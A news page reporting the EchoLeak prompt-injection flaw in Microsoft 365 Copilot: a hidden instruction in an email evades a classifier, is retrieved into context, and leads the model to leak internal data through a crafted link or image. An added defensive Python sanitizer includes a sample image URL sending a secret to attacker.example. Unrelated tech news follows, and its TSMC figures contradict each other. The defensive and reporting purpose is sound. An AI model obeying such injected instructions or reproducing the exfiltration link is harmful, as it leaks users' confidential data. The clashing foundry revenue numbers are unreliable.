
Researchers find 'dangerous' AI data leak flaw in Microsoft 365 Copilot: What the company has to say
A critical artificial intelligence (AI) vulnerability has been discovered in Microsoft 365 Copilot, raising new concerns about data security in AI-integrated enterprise environments. The flaw, dubbed 'EchoLeak', which enabled attackers to exfiltrate sensitive user data with zero-click interaction, was devised by Aim Labs researchers in January 2025.
According to a report by Bleeping Computer, Aim Labs promptly reported their findings to Microsoft, which rated it as critical. Microsoft swiftly addressed the issue, implementing a server-side fix in May 2025. This means that no user action is required to patch the vulnerability.
Microsoft has also stated there is no evidence of any real-world exploitation, essentially confirming that no customers were impacted by this flaw.
What the EchoLeak attack is and how it worked
The EchoLeak attack commenced with a malicious email sent to the target. This email contained text seemingly unrelated to Copilot, designed to resemble a typical business document. It embedded a hidden prompt injection crafted to instruct Copilot's underlying LLM to extract sensitive internal data. Because this hidden prompt was phrased like a normal message, it cleverly bypassed Microsoft's existing XPIA (cross-prompt injection attack) classifier protections.
Microsoft 365 Copilot, an AI assistant integrated into Office applications like Word, Excel, Outlook, and Teams, leverages OpenAI's GPT models and Microsoft Graph to help users generate content, analyse data and answer questions based on their organisation's internal files, emails, and chats.
When the user prompted Copilot with a related business question, Microsoft's Retrieval-Augmented Generation (RAG) engine retrieved the malicious email into the LLM's prompt context due to its apparent relevance and formatting. Once inside the LLM's active context, the malicious injection "tricked" the AI into pulling sensitive internal data and embedding it into a specially crafted link or image.
This led to unintentional leaks of internal data without explicit user intent or interaction.
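A defensive check for the exfiltration step described above, as an added example that is not from the article, Aim Labs or Microsoft: before a model response is rendered, every markdown link and image whose host is not on an allowlist is reduced to its visible text. It goes beyond the article by also covering reference-style markdown; the allowlisted hosts, `attacker.example` and the function names are assumptions, and it assumes the renderer does not pass raw HTML through.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only hosts the chat UI may link to or load images from.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "learn.microsoft.com"}

INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
REF_USE = re.compile(r"(!?)\[([^\]]*)\]\[([^\]]*)\]")
REF_DEF = re.compile(r"^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$", re.M)

# Constructed model response; attacker.example and the d= values are made up.
SAMPLE = (
    "Q3 summary is in [the report](https://contoso.sharepoint.com/q3).\n"
    "![status](https://attacker.example/p.png?d=CONSTRUCTED_SECRET)\n"
    "See [details][1] and ![logo][2].\n\n"
    "[1]: https://attacker.example/c?d=CONSTRUCTED_SECRET\n"
    "[2]: https://learn.microsoft.com/logo.png\n"
)

def host_allowed(url):
    """True only for http(s) URLs whose parsed hostname is on the allowlist."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and (parts.hostname or "").lower() in ALLOWED_HOSTS

def sanitize(markdown):
    """Return (safe_text, blocked_urls) for one model response before rendering."""
    blocked, refs = [], {}
    def check(url):
        if not host_allowed(url):
            blocked.append(url)
            return False
        return True

    def ref_def(m):  # record each "[label]: url" and drop off-allowlist ones
        ok = refs[m.group(1).lower()] = check(m.group(2))
        return m.group(0) if ok else ""

    def ref_use(m):  # "[text][label]" or "![alt][label]"; keep only the text if blocked
        label = (m.group(3) or m.group(2)).lower()
        return m.group(0) if refs.get(label) else m.group(2)

    text = REF_DEF.sub(ref_def, markdown)
    text = REF_USE.sub(ref_use, text)
    # Inline "[text](url)" and "![alt](url)"; images load on render without a click.
    text = INLINE.sub(lambda m: m.group(0) if check(m.group(3)) else m.group(2), text)
    return text, blocked
```

Logging the returned `blocked` list gives responders a signal that retrieved content tried to steer the model toward an external URL. An allowlisted host that redirects or proxies arbitrary requests defeats the check, so the list should stay short.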

Related Articles


Time of India
TSMC market share rises to 68% in Q1, extending global foundry lead
Taiwan Semiconductor Manufacturing Co (TSMC) has further solidified its dominance in the global pure-play wafer foundry market, growing its market share to 67.6% in the first quarter of this year, according to a report by Taipei-based research firm TrendForce Corp, reported by Focus Taiwan. Although TSMC's revenue declined by 5% quarter-on-quarter to $25.52 billion due to seasonal slowdowns, the company's market share still edged up from 67.1% in the previous quarter. TrendForce attributed this performance to continued strong demand for artificial intelligence (AI) and high-performance computing (HPC) applications, as well as accelerated client orders seeking to mitigate risks from ongoing U.S. tariff policies.

TSMC's closest competitor, South Korea's Samsung Electronics, saw its market share fall to 7.7%, down from 8.1% in the prior quarter. Samsung's foundry sales dropped by 11.3% to $2.89 billion over the same period.

China's Semiconductor Manufacturing International Corp. (SMIC) maintained its third-place ranking with a 6.0% market share, ahead of Taiwan's United Microelectronics Corp (UMC) at 4.7%, and US-based GlobalFoundries at 4.2%. Rounding out the top 10 were China's Huahong Group (2.7%), Taiwan's Vanguard International Semiconductor Corp. (1.0%), Israel's Tower Semiconductor (0.9%, or $35.8 billion), China's NexChip (0.9 per cent, or $35.3 billion), and Taiwan's Powerchip Semiconductor Manufacturing Corp. (0.9%, or 32.7 billion).

TrendForce noted that the top 10 foundries accounted for a combined USD 36.40 billion in sales during the first quarter, representing about 97% of the global total--an increase from 96 per cent in the previous quarter--despite an overall 5.4% drop in revenue across the group.


Time of India
Big tech on a quest for ideal AI device
ChatGPT-maker OpenAI has enlisted the legendary designer behind the iPhone to create an irresistible gadget for using generative artificial intelligence (AI). The ability to engage digital assistants as easily as speaking with friends is being built into eyewear, speakers, computers and smartphones, but some argue that the Age of AI calls for a transformational new gizmo.

"The products that we're using to deliver and connect us to unimaginable technology are decades old," former Apple chief design officer Jony Ive said when his alliance with OpenAI was announced. "It's just common sense to at least think, surely there's something beyond these legacy products."

Sharing no details, OpenAI chief executive Sam Altman said that a prototype Ive shared with him "is the coolest piece of technology that the world will have ever seen." According to several US media outlets, the device won't have a screen, nor will it be worn like a watch or brooch.

Kyle Li, a professor at The New School, said that since AI is not yet integrated into people's lives, there is room for a new product tailored to its use. The type of device won't be as important as whether the AI innovators like OpenAI make "pro-human" choices when building the software that will power them, said Rob Howard of consulting firm Innovating with AI.

Learning from flops

The industry is well aware of the spectacular failure of the AI Pin, a square gadget worn like a badge packed with AI features but gone from the market less than a year after its debut in 2024 due to a dearth of buyers. The AI Pin marketed by startup Humane to incredible buzz was priced at $699.

Now, Meta and OpenAI are making "big bets" on AI-infused hardware, according to CCS Insight analyst Ben Wood. OpenAI made a multi-billion-dollar deal to bring Ive's startup into the fold. Google announced early this year it is working on mixed-reality glasses with AI smarts, while Amazon continues to ramp up Alexa digital assistant capabilities in its Echo speakers and displays.

Apple is being cautious embracing generative AI, slowly integrating it into iPhones even as rivals race ahead with the technology. Plans to soup up its Siri chatbot with generative AI have been indefinitely delayed. The quest for creating an AI interface that people love "is something Apple should have jumped on a long time ago," said Futurum research director Olivier Blanchard.

Time to talk

Blanchard envisions some kind of hub that lets users tap into AI, most likely by speaking to it and without being connected to the internet. "You can't push it all out in the cloud," Blanchard said, citing concerns about reliability, security, cost, and harm to the environment due to energy demand. "There is not enough energy in the world to do this, so we need to find local solutions," he added.

Howard expects a fierce battle over what will be the must-have personal device for AI, since the number of things someone is willing to wear is limited and "people can feel overwhelmed." A new piece of hardware devoted to AI isn't the obvious solution, but OpenAI has the funding and the talent to deliver, according to Julien Codorniou, a partner at venture capital firm 20VC and a former Facebook executive. OpenAI recently hired former Facebook executive and Instacart chief Fidji Simo as head of applications, and her job will be to help answer the hardware question.

Voice is expected by many to be a primary way people command AI. Google chief Sundar Pichai has long expressed a vision of "ambient computing" in which technology blends invisibly into the world, waiting to be called upon.

"There's no longer any reason to type or touch if you can speak instead," Blanchard said. "Generative AI wants to be increasingly human" so spoken dialogues with the technology "make sense," he added. However, smartphones are too embedded in people's lives to be snubbed any time soon, said Wood.


Time of India
Elon Musk's X sees partial recovery after outage hits US users
Social media platform X showed signs of recovery on Saturday after an outage disrupted access for thousands of users in the United States, according to outage tracking website Downdetector.com. Reports of disruptions had dropped to around 1,041 by 7:42 p.m. ET, down from a peak of more than 10,000, according to Downdetector, which tracks outages by collating status reports from various sources. Downdetector's numbers are based on user-submitted reports. The actual number of affected users may vary.

In May, Musk, who spent nearly $300 million to back U.S. President Donald Trump's presidential campaign and other Republicans last year, said he'll resume working '24/7' at his companies. "Back to spending 24/7 at work and sleeping in conference/server/factory rooms. I must be super focused on X/xAI and Tesla (plus Starship launch next week), as we have critical technologies rolling out," Musk had said in an X post. "As evidenced by the X uptime issues this week, major operational improvements need to be made," he added.

Earlier in March, Musk had blamed a cyberattack after a similar outage at X. X did not immediately respond to a Reuters request for comment.